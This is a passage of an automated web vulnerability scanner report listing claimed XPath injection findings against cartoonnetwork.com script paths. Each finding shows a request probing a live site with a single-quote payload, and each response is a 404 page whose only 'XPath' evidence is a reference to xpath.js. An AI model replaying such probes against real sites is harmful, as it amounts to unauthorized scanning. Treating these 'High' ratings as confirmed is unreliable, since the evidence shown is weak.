HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:45:12 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.42. http://www.cartoonnetwork.com/freewheel/js/fwjslib_1.1.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /freewheel/js/fwjslib_1.1.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /freewheel/js'/fwjslib_1.1.js HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:45:13 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.43. http://www.cartoonnetwork.com/freewheel/js/fwjslib_1.1.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /freewheel/js/fwjslib_1.1.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /freewheel/js/fwjslib_1.1.js' HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:45:14 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.44. http://www.cartoonnetwork.com/games/tools/js/main/FlexSpace_games.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /games/tools/js/main/FlexSpace_games.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /games'/tools/js/main/FlexSpace_games.js HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:49:50 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.45. http://www.cartoonnetwork.com/games/tools/js/main/FlexSpace_games.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /games/tools/js/main/FlexSpace_games.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /games/tools'/js/main/FlexSpace_games.js HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:49:51 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.46. http://www.cartoonnetwork.com/games/tools/js/main/FlexSpace_games.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /games/tools/js/main/FlexSpace_games.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /games/tools/js'/main/FlexSpace_games.js HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:49:51 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.47. http://www.cartoonnetwork.com/games/tools/js/main/FlexSpace_games.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /games/tools/js/main/FlexSpace_games.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 4, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /games/tools/js/main'/FlexSpace_games.js HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:49:51 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.48. http://www.cartoonnetwork.com/games/tools/js/main/FlexSpace_games.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /games/tools/js/main/FlexSpace_games.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 5, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /games/tools/js/main/FlexSpace_games.js' HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:49:51 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.49. http://www.cartoonnetwork.com/games/tools/js/main/datasets.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /games/tools/js/main/datasets.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /games'/tools/js/main/datasets.js HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:49:48 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.50. http://www.cartoonnetwork.com/games/tools/js/main/datasets.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /games/tools/js/main/datasets.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /games/tools'/js/main/datasets.js HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:49:48 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.51. http://www.cartoonnetwork.com/games/tools/js/main/datasets.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /games/tools/js/main/datasets.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /games/tools/js'/main/datasets.js HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:49:49 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.52. http://www.cartoonnetwork.com/games/tools/js/main/datasets.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /games/tools/js/main/datasets.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 4, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /games/tools/js/main'/datasets.js HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:49:49 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.53. http://www.cartoonnetwork.com/games/tools/js/main/datasets.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /games/tools/js/main/datasets.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 5, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /games/tools/js/main/datasets.js' HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:49:49 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.54. http://www.cartoonnetwork.com/games/tools/js/main/main.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /games/tools/js/main/main.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /games'/tools/js/main/main.js HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:49:51 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.55. http://www.cartoonnetwork.com/games/tools/js/main/main.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /games/tools/js/main/main.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /games/tools'/js/main/main.js HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:49:51 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.56. http://www.cartoonnetwork.com/games/tools/js/main/main.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /games/tools/js/main/main.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /games/tools/js'/main/main.js HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:49:51 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.57. http://www.cartoonnetwork.com/games/tools/js/main/main.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /games/tools/js/main/main.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 4, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /games/tools/js/main'/main.js HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:49:52 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.58. http://www.cartoonnetwork.com/games/tools/js/main/main.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /games/tools/js/main/main.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 5, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /games/tools/js/main/main.js' HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:49:52 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
